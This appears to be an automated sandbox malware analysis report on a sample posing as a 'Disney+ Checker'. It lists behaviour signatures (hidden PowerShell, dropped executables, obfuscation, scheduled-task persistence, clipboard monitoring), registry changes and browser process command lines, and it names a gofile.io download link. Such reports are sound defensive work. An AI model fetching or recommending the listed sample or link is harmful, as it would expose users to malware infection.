Analysis
-
max time kernel
480s -
max time network
510s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2024 08:37
Static task
static1
URLScan task
urlscan1
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 5140 powershell.exe 5380 powershell.exe 5588 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
A1.exeFontDriverHost.exepid process 5808 A1.exe 4316 FontDriverHost.exe -
Loads dropped DLL 1 IoCs
Processes:
A1.exepid process 5808 A1.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/memory/5808-207-0x0000000005710000-0x0000000005934000-memory.dmp agile_net -
Processes:
resource yara_rule behavioral1/memory/6040-221-0x0000000000400000-0x000000000042A000-memory.dmp upx behavioral1/memory/6040-225-0x0000000000400000-0x000000000042A000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Disney+ Checker By PJ v1.1.exepowershell.exeA1.exeattrib.exeFontDriverHost.execmd.exepowershell.exepowershell.exeschtasks.exeFontDriverHost.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Disney+ Checker By PJ v1.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FontDriverHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FontDriverHost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 64 IoCs
Processes:
A1.exemsedge.exemsedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 A1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Documents" A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" A1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" A1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Downloads" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" A1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "7" A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU A1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" A1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "6" A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 A1.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2412658365-3084825385-3340777666-1000\{978630FF-3ECB-4D8C-AA9C-BE518C894DD9} msedge.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" A1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" A1.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e80922b16d365937a46956b92703aca08af0000 A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000000000001000000ffffffff A1.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" A1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" A1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" A1.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
FontDriverHost.exepid process 4316 FontDriverHost.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exepowershell.exemsedge.exemsedge.exepid process 1208 msedge.exe 1208 msedge.exe 1220 msedge.exe 1220 msedge.exe 2924 identity_helper.exe 2924 identity_helper.exe 4520 msedge.exe 4520 msedge.exe 5140 powershell.exe 5140 powershell.exe 5140 powershell.exe 5380 powershell.exe 5380 powershell.exe 5380 powershell.exe 5588 powershell.exe 5588 powershell.exe 5588 powershell.exe 5140 powershell.exe 6124 msedge.exe 6124 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
A1.exepid process 5808 A1.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
Processes:
msedge.exepid process 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exeAUDIODG.EXEAUDIODG.EXEdescription pid process Token: SeDebugPrivilege 5140 powershell.exe Token: SeDebugPrivilege 5380 powershell.exe Token: SeDebugPrivilege 5588 powershell.exe Token: 33 5396 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 5396 AUDIODG.EXE Token: 33 5716 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 5716 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 33 IoCs
Processes:
msedge.exepid process 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe 1220 msedge.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
A1.exepid process 5808 A1.exe 5808 A1.exe 5808 A1.exe 5808 A1.exe 5808 A1.exe 5808 A1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 1220 wrote to memory of 116 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 116 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 3712 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 1208 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 1208 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe PID 1220 wrote to memory of 4504 1220 msedge.exe msedge.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/NGsQfm1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f8b946f8,0x7ff8f8b94708,0x7ff8f8b947182⤵PID:116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:22⤵PID:3712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:82⤵PID:4504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:4380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:12⤵PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:12⤵PID:4512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:82⤵PID:1872
-
-
